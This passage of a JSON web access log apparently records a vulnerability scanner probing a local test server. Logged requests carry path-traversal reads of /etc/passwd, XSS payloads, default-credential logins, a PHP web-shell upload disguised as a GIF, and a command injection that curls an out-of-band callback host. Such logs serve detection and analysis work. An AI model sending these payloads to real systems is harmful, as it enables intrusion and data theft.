/etc/passwd'\x22", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/tmindex.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"username=apollo&password=admin&login-submit=Login","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /signin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/signin?", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /apisix/admin/migrate/export HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.798","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/config.exp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ssl/127.0.0.1.key HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.280","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.290","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/8 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.814","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.307","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql/console HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.474","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"\x22name\x22:\x22';$(curl http://c9oms3gsmpve1ijt0mc0wj3sdqt1u3mt9.oast.live);'\x22,\x0D\x0A\x22email\x22:\x22a@b.c\x22","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.392","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.384","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.502","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.380","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /temp.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/9 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.262","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.265","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"j_username=admin&j_password=admin&from=%2F&Submit=Sign+in","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /j_spring_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sapi/debug/default/view HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.276","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql/graphql-playground HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.262","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /NON_EXISTING_PATH/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.788","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /administrator/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /old_phpinfo.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/10 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql/schema.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.290","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.236","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /apache.conf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.400","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet/showenv HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.644","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /infos.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"yuzo_related_post_css_and_style=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/.well-known/openid-configuration HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /auth/admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.476","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.350","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /docker-compose.override.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.643","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.458","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:46 +0000","request_body":"-----------------------------31046105003900160576454225745\x0D\x0AContent-Disposition: form-data; name=\x22fileToUpload\x22; filename=\x2228fHqPVWJe2V8fHfGKKoTnjg1sl.php\x22\x0D\x0AContent-Type: image/gif\x0D\x0A\x0D\x0AGIF89a213213123 \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /_async/AsyncResponseService HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /28fHqXZrbS026pgRF2yYjTihYW1.php%5Cx0A HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.458","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql/schema.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.413","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /authentication/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.462","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /s/28fHqVD2ig2LTVZM2LObKKKIHOI/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.445","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.464","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 